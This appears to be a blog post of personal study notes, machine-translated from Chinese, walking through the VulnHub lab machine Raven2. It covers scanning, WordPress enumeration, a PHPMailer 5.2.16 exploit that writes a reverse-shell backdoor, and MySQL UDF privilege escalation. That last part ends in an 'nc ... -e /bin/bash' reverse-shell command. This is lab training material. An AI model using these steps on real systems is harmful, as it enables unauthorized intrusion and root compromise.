当前位置:网站首页>Raven2 of vulnhub
Raven2 of vulnhub
2022-07-03 11:47:00 【Plum_ Flowers_ seven】
Only take personal study notes
Catalog
3、 ... and 、 Service version detection
1. Always requesting resources
7、 ... and 、mysql And udf Raise the right
One 、 The host found

Two 、 Port scanning

3、 ... and 、 Service version detection
routine 22,80 port .
111 This is an incomprehensible
42689 Open the remote process call protocol

Four 、 information gathering
1. Always requesting resources
It is the same as the original request for some foreign site resources , As a result, it cannot be loaded normally , Just hang a ladder . If you use burp, Just hang it on two floors .
It's a security company interface

2. Regular source code
Look at the interface , Source code leakage , Is there a hidden directory , None .
5、 ... and 、 Scan directory
The most basic information is wordpress Station building

1. /vendor
3,4,5 All the documents mentioned PHPMailer,readme It's a readme , It introduces phpmailer It's a php Mail transmission class ,. and security He mentioned his historical loopholes .changelog Tell the change log .
Try from phpmailer Make a breakthrough

(1)flag1

6、 ... and 、phpmailer
Because we can know from the above file that the version is 5.2.16, So try these .
1.40974.py
40974.py It can be used . Write bounce to target path shell file .

Be careful : You need to change the contents of the file before using
(1) Change back to the connection address
(2) Write the backdoor file path
(3) The goal is ip
You can also change the file name

2. Access trigger
3. rebound shell
7、 ... and 、mysql And udf Raise the right
When we collect information , It is found that there is leakage mysql Account and password ,
When checking the process , And found out mysql In order to root It belongs to the main operation , So we can use mysql Right to come ,
1. information gathering
root [email protected]

2.udf Raise the right
udf The original intention of the design is to facilitate users to customize some functions , It is convenient to query some complex data , At the same time, the use of udf The possibility of raising rights .
An attacker calls... By writing cmd perhaps shell Of udf.dll file , And import it into a specified folder Directory , Create a point to udf.dll The custom function of , Thus, the query in the database is equivalent to cmd perhaps shell Middle execution command .
3. step
(1) find kali Self contained udf Lift the right link library file .so

(2)64.so To the target plane
It's better to put /tmp Next
(3) Check the plug-in path
show variables like '%plugin%';
(4) Write to the database through the link library file
Using the system database , Create a table , Write link library file data .
use mysql;
create table a(line blob);
insert into a values(load_file('/tmp/x.so'));
(5) Then write the link library file to the plug-in location
select * from a into dumpfile '/usr/lib/mysql/plugin/x.so';
(6) Create a new function
create function sys_exec returns integer soname 'x.so';
(7) Execute bounce shell
select sys_exec('nc 192.168.0.107 6666 -e /bin/bash');

边栏推荐
- Qt+VTK+OCCT读取IGES/STEP模型
- Multi dimensional monitoring: the data base of intelligent monitoring
- CSRF
- MySQL searches and sorts out common methods according to time
- Solicitation for JGG special issue: spatio-temporal omics
- STL教程10-容器共性和使用场景
- R language uses the aggregate function to calculate the mean value (sum) of dataframe data grouping aggregation without setting na The result of RM calculation. If the group contains the missing value
- Cuiyusong, CTO of youzan: the core goal of Jarvis is to make products smarter and more reliable
- The world's most popular font editor FontCreator tool
- Nestjs配置服务,配置Cookie和Session
猜你喜欢
随机推荐
This article explains the complex relationship between MCU, arm, MCU, DSP, FPGA and embedded system
ASP. Net hotel management system
836. Merge sets (day 63) and search sets
ftp登录时,报错“530 Login incorrect.Login failed”
Cadence background color setting
The R language uses the hist function in the native package (basic import package, graphics) to visualize the histogram plot
mysql使用update联表更新的方法
Event preview | the live broadcast industry "rolled in" to drive new data growth points with product power
MySQL searches and sorts out common methods according to time
Key switch: press FN when pressing F1-F12
R language uses grid of gridextra package The array function combines multiple visual images of the lattice package horizontally, and the ncol parameter defines the number of columns of the combined g
PHP基础
Xml的(DTD,xml解析,xml建模)
Solicitation for JGG special issue: spatio-temporal omics
解决msvcp120d.dll和msvcr120d.dll缺失
rxjs Observable filter Operator 的实现原理介绍
ORACLE进阶(一) 通过EXPDP IMPDP命令实现导dmp
Gut | Yu Jun group of the Chinese University of Hong Kong revealed that smoking changes intestinal flora and promotes colorectal cancer (do not smoke)
Excel quick cross table copy and paste
《剑指offer 03》数组中重复的数字









